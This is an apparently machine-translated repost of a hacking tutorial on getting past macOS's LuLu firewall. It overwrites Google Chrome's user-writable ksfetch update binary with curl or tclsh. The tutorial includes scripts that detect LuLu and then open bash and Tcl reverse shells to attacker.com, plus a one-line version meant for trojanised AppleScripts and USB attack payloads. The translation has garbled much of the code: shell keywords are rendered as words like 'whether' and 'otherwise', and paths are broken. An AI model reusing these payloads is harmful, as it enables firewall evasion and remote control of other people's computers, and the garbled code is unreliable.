قالب وردپرس درنا توس
Home / Tips and Tricks / How to Avoid the LuLu Firewall with Google Chrome Dependencies «Null Byte :: WonderHowTo

How to Avoid the LuLu Firewall with Google Chrome Dependencies «Null Byte :: WonderHowTo



Firewall solutions for macOS are not immune to attacks. By exploiting the benefits of web browser dependencies that have already been whitelisted by the firewall, an attacker can filter data or remotely control a MacBook, iMac, Mac mini, or other computer running macOS (formerly known) as Mac OS X).

In a recent article, Kody showed how to set up and install LuLu, an open-source firewall solution for macOS. Although I had never tried LuLu before, it always seemed to be a reliable and free alternative to Little Snitch. After installing LuLu, I tried to find a way to bypass the detection system.

Step 1
: First-time installation of LuLu

During the installation, LuLu has begun to find Mac applications already installed in the operating system and put them in a whitelist.

If my system was compromised before installing LuLu, it may miss a suspicious outgoing connection and inadvertently whitelist the activity. That's why I decided not to use this feature. Any non-Apple connections are reported and require user interaction.

It also took me a few minutes to remove some apps on the whitelist that were not essential and minimized the attack surface. If we look at the remaining programs, they are all in protected directories that can not be changed with user rights (ie without root).

Top Image: Minimal software installed after installing LuLu the whitelist was set. Bottom image: No additional third-party software (eg Chrome, Firefox, VLC).

After first opening Google Chrome after installing LuLu, the Chrome Helper process has tried to connect to the Internet via DNS request.

This activity should not affect the functionality of the application. Chrome eventually tried to upgrade itself using the ksfetch and GoogleSoftwareUpdateAgent processes. Ksfetch and the update agent are known mechanisms of Google Chrome. Both instances were allowed because Chrome may not be upgradable in the future.

Step 2: Bypassing LuLu with Applications Installed

The workaround is made possible by weak file and directory permissions assigned to some third-party applications installed outside of the App Store. Let's look at the file permissions for the Google Chrome browser, installed directly from Google through the DMG installer.

  ~ $ ls -l / Applications /

total 0
drwxr-xr-x 3 root admin 96B Jun 12 03:23 1Password 7.app
drwxr-xr-x @ 3 Root wheel 96B Aug 18 2018 Calculator.app
drwxr-xr-x @ 3 Root wheel 96B Aug 18 2018 FaceTime.app
drwxr-xr-x @ 3 tokyoneon admin 96B Jun 4 08:50 Google Chrome.app
drwxr-xr-x @ 3 Root wheel 96B Aug 18 2018 Home.app
drwxr-xr-x @ 3 Rootwheel 96B August 18, 2018 Image Capture.app 

Note that the Google Chrome app belongs to the user and is not "root" like other applications. Looking again at the ksfetch and GoogleSoftwareUpdateAgent rules in LuLu, we will see that both binaries are in the / Users / $ USER / Library / directory.

In addition to the files in the Chrome directory, these binaries can be changed by the user. To be clear, all files in / Users / $ USER / Library / and / Application / Google Chrome.app/ are a fair game for an attacker and can be easily changed.

The following command overrides ksfetch with curl which is not listed as a whitelist in the LuLu firewall.

  ~ $ cp / usr / bin / curl /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch[19659026}Withoutwhiteyoucanstillgrabthiswayofaccessingtheinternet[199659024]~ $ / Users / $ USER / Library / Google / GoogleSoftwareUpdate / GoogleSoftwareUpdate.bundle / Contents / MacOS / ksfetch "https://ifconfig.me/all"

ip_addr: 198.251.89.219
remote_host: not available
user_agent: curl / 7.54.0
Port: 28596
Language:
referer:
Connection:
stay alive:
Method: GET
Encoding:
mime: * / *
Character set:
via: 1.1 google
forwarded: 198.251.89.219, 216.239.36.21 ~ 

This example uses ksfetch. However, GoogleSoftwareUpdateAgent and Google Chrome itself can be overridden and used to connect to a remote server or to filter data. Overriding Chrome will of course affect the browser's functionality. However, an attacker would have already filtered out confidential information by that time. With this knowledge, we can set up reverse shell payloads and remotely control the Mac from anywhere.

Step 3: Overwrite ksfetch with Tclsh

The following example uses the command tclsh that is used to create an Interactive bash-like shell that allows the attacker to execute commands remotely. For a good reason, the tclsh binaries and symlinks in the firewall were manually blocked.

As a low-privileged user, the tclsh binary is copied via ksfetch. The file and its functions are completely overwritten.

  ~ $ cp / usr / bin / tclsh /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch[19659026lightboxThe tcl The command  is created by directly invoking the binary file  ksfetch  called. From this interactive terminal, commands are executed the same way as with a Netcat or Bash shell. 

  ~ $ / Users / Friends / Library / Google / Google Software Update / Google Software Update

% ls -la /
a total of 36
drwxr-xr-x @ 2 Rootwheel 64 Jun 25 09:57 .PKInstallSandboxManager system software
drwx ------ 5 Root wheel 160 June 5 19:36 .Spotlight-V100
drwxrwxr-x + 138 root admin 4416 Jun 25 09:54 Applications
drwxr-xr-x + 70 Root Wheel 2240 June 5 19:37 Library
drwxr-xr-x @ 2 Rootwheel 64 5 October 2018 Network
drwxr-xr-x @ 5 Root wheel 160 Sep 21 2018 System
drwxr-xr-x 6 root admin 192 May 10 17:34 User
drwxr-xr-x @ 5 root wheel 160 June 25 18:51 Volumes
drwxr-xr-x @ 37 root wheel 1184 May 22 11:14 am
drwxrwxr-t @ 2 root admin 64 Oct 5 2018 cores
dr-xr-xr-x 3 Rootwheel 7834 Jun 25 09:50 dev
lrwxr-xr-x @ 1 root wheel 11 Oct 5 2018 etc -> private / etc
dr-xr-xr-x 2 root wheel 1 Jun 25 16:57 home
dr-xr-xr-x 2 rootwheel 1 Jun 25 16:57 net
drwxr-xr-x 3 Root wheel 96 October 3, 2018 opt
drwxr-xr-x 6 root wheel 192 5. june 17:49 private
drwxr-xr-x @ 64 Root wheel 2048 May 22 11:14 sbin
lrwxr-xr-x @ 1 Rootwheel 11 Oct 5 2018 tmp -> private / tmp
drwxr-xr-x @ 9 Root wheel 288 September 21, 2018 usr
lrwxr-xr-x @ 1 root wheel 11 Oct 5 2018 var -> private / var

% uname -a
Darwin User MacBook.local 18.6.0 Darwin Kernel Version 18.6.0: Thu 25.04. 23:16:27 PDF 2019; root: xnu-4903.261.4 ~ 2 / RELEASE_X86_64 x86_64
% 

Step 4: Design Payload with Active Evasion

So how would an attacker know if LuLu is installed on the operating system? You can list the installed security software by running the package check and watching LuLu automatic updates. Instead, the payload must recognize LuLu characters before executing instructions.

The following example examines background processes with the command ps . As we can see, several processes named "LuLu" are active.

  ~ $ ps auxwww | grep -i [l] ulu

root 94 0.3 0.7 4349052 28088 ?? Rs 1:33 AM 0: 18.59 /Library/Objective-See/LuLu/LuLu.bundle/Contents/MacOS/LuLu
tokyoneon 291 0,0 0,8 4924936 35092 ?? S 1:34 AM 0: 01.10 /Applications/LuLu.app/Contents/Library/LoginItems/LuLu Helper.app/Contents/MacOS/LuLu Helper 

A simple bash statement if embedded in a AppleScript was able to effectively recognize the LuLu process.

  #! / bin / bash

whether [[!"$(/bin/psauxwww|/usr/bin/grep-i[l] ulu) "]]then
Echo "LuLu not found."
otherwise
Echo "LuLu recognized."
fi 

A handy script that goes beyond detecting LuLu processes and automatically overrides Google Chrome binaries can look like this:

  #! / bin / bash

# The `ps` command can be used to display active processes and
# Locate LuLu in the background with `grep`.
whether [[!"$(/bin/psauxwww|/usr/bin/grep-i[l] ulu) "]]then

# An arbitrary "echo" command. If LuLu is not found
# The following commands are executed. An example bash
# Reverse shell is included.
Echo "LuLu not found, hack the planet!"
/ bin / bash -i> & /dev/tcp/attacker.com/443 0> & 1
otherwise
# Any "echo" command with a sad face.
Echo "Lulu discovers 🙁

# Copy the `tclsh` binary file over` ksfetch`.
/ bin / cp / usr / bin / tclsh / Users /$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch

# TCL reverse shell, which is covered in the following article.
# https://null-byte.com/tcl-0186330/
echo's set [socket attacker.com 443]; while 42 {puts -nonewline $ s "hacker>"; flush $ s; gets $ sc; set e "exec $ c"; if {! [catch {set r [eval $e]} err]} {puts $ s $ r}; Flush $ s; }; close $ s; & # 39; | /Users/$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch &

# Another "echo" command.
Echo "Bypass LuLu and hack the planet!"
fi 

The script can be summarized in one line to easily work with trojanised AppleScripts, mousejack attacks, dead USB drops, and USB Rubber Ducky payloads.

  if [[!"$(/bin/psauxwww|/usr/bin/grep-i[l] ulu) "]]; then / bin / bash -i> & /dev/tcp/attacker.com/443 0> & 1; else / bin / cp / usr / bin / tclsh / Users /$USER/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch && echo # s [socket attacker.com 443]; while 42 {puts -nonewline $ s "hacker>"; flush $ s; gets $ set e "exec $ c"; if {! [catch {set r [eval $e]} err]} {puts $ s $ r}; flush $ s;}; close $ s; & # 39; / Users / $ USER / Library /Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/ksfetch & fi 

If Chrome is not installed on the target system, it may take a while to determine another dependency of an alternate browser. Detecting the installed browsers might look like this:

  #! / Bin / bash

whether [[!"$(/bin/psauxwww|/usr/bin/grep-i[l] ulu) "]]then
Echo "LuLu not found."
otherwise
Echo "LuLu recognized."
if [[ -d "/Applications/Google Chrome.app/" ]]; then
echo "Chrome browser detected. Ksfetch override ..."
elif [[ -d "/Applications/Firefox.app/" ]]; then
echo "Firefox detected overwriting  ..."
elif [[ -d "/Applications/Opera.app/" ]]; then
Echo "Opera Recognized Overwrite  ..."
otherwise
echo "Oh, we do not have any more browsers we can exploit ..."
fi
fi 

Identifying Inconsistencies with the Bypass

With LuLu, ksfetch (tclsh) was able to access the Internet for most, but not always, the Internet. Once, I found that restarting the MacBook caused the bypass to fail and triggered the LuLu detection system, even though ksfetch and other Chrome binaries were whitelisted.

I was not allowed to spend a lot of time with LuLu, but encouraged anyone interested in this attack to find out when and why whitelist processes are sometimes stopped.

No security software is perfect.

This article is not intended as an attack on LuLus Developer. It just shows that security software is not perfect and no system is fully protected during use.

LuLu is a fantastic firewall solution designed to prevent passive and frequent attacks. Like most programs, it is not designed to withstand a targeted attack by active evasion. Does this mean that we should stop using LuLu and other security solutions? Absolutely not. Although this bug is easy to reproduce and is not considered a significant security hole, firewall software such as LuLu can still prevent attacks. For example, with an existing tclsh connection, the attacker is limited to a few built-in tools that are not listed on the whitelist of the firewall. Downloading additional software or filtering data is much more difficult thanks to LuLu.

If you liked this article, follow me on Twitter @tokyoneon_ as I intend to release bypasses for other security software in the future. If you have questions or concerns, leave a comment or message on Twitter.

Hacking MacOS: Store 1Password, LastPass, KeePassX, and Keychain Passwords in Plain Text

Cover photo and screenshots of tokyoneon / Null Byte [19659064]

Source link